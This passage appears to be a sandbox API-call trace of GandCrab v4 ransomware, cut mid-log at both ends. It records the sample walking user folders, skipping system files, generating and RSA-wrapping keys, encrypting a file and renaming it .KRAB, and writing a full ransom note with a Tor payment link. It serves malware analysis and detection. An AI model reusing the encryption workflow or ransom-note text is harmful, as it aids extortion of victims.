(lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0085.339] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0085.339] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\KRAB-DECRYPT.txt" [0085.339] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.339] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\KRAB-DECRYPT.txt.KRAB") returned 75 [0085.339] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\KRAB-DECRYPT.txt") returned 70 [0085.339] lstrlenW (lpString=".txt") returned 4 [0085.339] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.340] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0085.340] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.340] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\KRAB-DECRYPT.txt") returned 70 [0085.340] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\KRAB-DECRYPT.txt") returned 70 [0085.340] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0085.340] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0085.340] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0085.340] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0085.340] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0085.340] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0085.340] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0085.340] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0085.340] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0085.340] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0085.340] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.341] FindNextFileW (in: hFindFile=0x1023338, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0085.341] lstrcmpW (lpString1="roottools.conf", lpString2=".") returned 1 [0085.341] lstrcmpW (lpString1="roottools.conf", lpString2="..") returned 1 [0085.341] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\", lpString2="roottools.conf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf" [0085.341] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.341] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf.KRAB") returned 73 [0085.341] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf") returned 68 [0085.341] lstrlenW (lpString=".conf") returned 5 [0085.341] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.342] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".conf ") returned 6 [0085.342] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.342] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf") returned 68 [0085.342] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf") returned 68 [0085.342] lstrcmpiW (lpString1="roottools.conf", lpString2="desktop.ini") returned 1 [0085.342] lstrcmpiW (lpString1="roottools.conf", lpString2="autorun.inf") returned 1 [0085.342] lstrcmpiW (lpString1="roottools.conf", lpString2="ntuser.dat") returned 1 [0085.342] lstrcmpiW (lpString1="roottools.conf", lpString2="iconcache.db") returned 1 [0085.342] lstrcmpiW (lpString1="roottools.conf", lpString2="bootsect.bak") returned 1 [0085.342] lstrcmpiW (lpString1="roottools.conf", lpString2="boot.ini") returned 1 [0085.342] lstrcmpiW (lpString1="roottools.conf", lpString2="ntuser.dat.log") returned 1 [0085.342] lstrcmpiW (lpString1="roottools.conf", lpString2="thumbs.db") returned -1 [0085.342] lstrcmpiW (lpString1="roottools.conf", lpString2="KRAB-DECRYPT.html") returned 1 [0085.342] lstrcmpiW (lpString1="roottools.conf", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.343] lstrcmpiW (lpString1="roottools.conf", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.343] lstrcmpiW (lpString1="roottools.conf", lpString2="ntldr") returned 1 [0085.343] lstrcmpiW (lpString1="roottools.conf", lpString2="NTDETECT.COM") returned 1 [0085.343] lstrcmpiW (lpString1="roottools.conf", lpString2="Bootfont.bin") returned 1 [0085.343] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.343] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x10108a8) returned 1 [0085.344] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0085.345] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.345] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.345] CryptGenRandom (in: hProv=0x10108a8, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0085.345] CryptReleaseContext (hProv=0x10108a8, dwFlags=0x0) returned 1 [0085.345] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.346] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011458) returned 1 [0085.347] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0085.348] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.348] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.348] CryptGenRandom (in: hProv=0x1011458, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0085.348] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0085.348] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.348] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011700) returned 1 [0085.350] CryptImportKey (in: hProv=0x1011700, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1022ff8) returned 1 [0085.350] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0085.350] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0085.350] GetLastError () returned 0x0 [0085.350] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0085.350] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0085.350] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010df8) returned 1 [0085.352] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1023138) returned 1 [0085.352] CryptGetKeyParam (in: hKey=0x1023138, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0085.352] CryptEncrypt (in: hKey=0x1023138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0085.352] GetLastError () returned 0x0 [0085.352] CryptDestroyKey (hKey=0x1023138) returned 1 [0085.352] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0085.353] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\skype\\roottools\\roottools.conf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0085.353] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0085.354] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0085.354] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x4c, lpOverlapped=0x0) returned 1 [0085.368] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffffb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.368] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x4c, lpOverlapped=0x0) returned 1 [0085.368] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0085.368] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.372] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.377] CloseHandle (hObject=0x43c) returned 1 [0085.377] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.378] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\skype\\roottools\\roottools.conf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\skype\\roottools\\roottools.conf.krab")) returned 1 [0085.426] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.426] FindNextFileW (in: hFindFile=0x1023338, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0085.426] FindClose (in: hFindFile=0x1023338 | out: hFindFile=0x1023338) returned 1 [0085.427] CloseHandle (hObject=0x474) returned 1 [0085.427] FindNextFileW (in: hFindFile=0x1023378, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0 [0085.427] FindClose (in: hFindFile=0x1023378 | out: hFindFile=0x1023378) returned 1 [0085.427] CloseHandle (hObject=0x3a8) returned 1 [0085.427] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0085.427] lstrcmpW (lpString1="Sun", lpString2=".") returned 1 [0085.427] lstrcmpW (lpString1="Sun", lpString2="..") returned 1 [0085.427] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="Sun" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun" [0085.427] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\" [0085.427] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0085.428] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0085.428] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0085.428] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0085.428] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0085.428] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.428] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.429] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\\\KRAB-DECRYPT.txt") returned 59 [0085.429] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\sun\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0085.430] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0085.430] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338ed20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338ed20*=0x1f6e, lpOverlapped=0x0) returned 1 [0085.430] CloseHandle (hObject=0x3a8) returned 1 [0085.431] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.431] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.431] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x20, wMilliseconds=0x274)) [0085.431] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.432] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0085.432] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0085.432] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\d2ca4a08d2ca4dee3d.lock") returned 65 [0085.432] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\sun\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3a8 [0085.433] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.433] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.434] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\") returned 42 [0085.434] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\*" [0085.434] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\*", lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0x1022ff8 [0085.434] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.434] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0085.434] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.434] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.434] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0085.434] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0085.434] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0085.434] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\d2ca4a08d2ca4dee3d.lock" [0085.434] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.435] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 70 [0085.435] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\d2ca4a08d2ca4dee3d.lock") returned 65 [0085.435] lstrlenW (lpString=".lock") returned 5 [0085.435] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.435] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0085.435] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.436] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.436] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0085.436] lstrcmpW (lpString1="Java", lpString2=".") returned 1 [0085.436] lstrcmpW (lpString1="Java", lpString2="..") returned 1 [0085.436] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\", lpString2="Java" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java" [0085.436] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\" [0085.436] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0085.436] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0085.437] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0085.437] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0085.437] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0085.437] VirtualFree (lpAddress=0x2f30000, 